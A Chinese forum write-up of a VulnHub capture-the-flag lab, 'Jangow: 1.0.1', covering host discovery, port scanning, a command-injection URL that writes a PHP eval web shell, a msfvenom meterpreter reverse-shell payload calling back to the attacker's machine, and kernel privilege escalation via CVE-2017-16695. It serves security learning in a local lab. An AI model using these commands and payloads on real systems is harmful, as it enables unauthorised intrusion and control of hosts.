zhaorong 发表于 2022-12-16 15:40:32

vulnhub系列2——Jangow: 1.0.1

前言:

习惯事与愿违。

vulnhub打靶系列文章

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

所有环境均为在线下载的靶场,且在本机进行学习。

一、信息收集

首先进行主机的存活探测

netdiscover -r 192.168.56.0/24


之后对其进行端口扫描

nmap -sV -Pn -sC 192.168.56.118


二、反弹shell提权

在网页上发现其一处可有命令执行


对其进行一句话的写入,使用蚁剑连接

http://192.168.56.118/site/busque.php?buscar=echo '<?=@eval($_POST);' >a.php


其权限很低


我们上传辅助提权工具,进行探测


但是在蚁剑上都提权失败,查询生成一个php马,将会话发送到msf上。通过蚁剑上传然后浏览器执行。

(这里不知道为啥只有443端口可以反弹成功。。。在这一步疑惑了很久)

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.105 lport=443 -f raw -o shell.php


调用交互shell

python3 -c "import pty;pty.spawn('/bin/bash');"


之后对其进行提权就成功了,使用CVE-2017-16695提权成功

页: [1]
查看完整版本: vulnhub系列2——Jangow: 1.0.1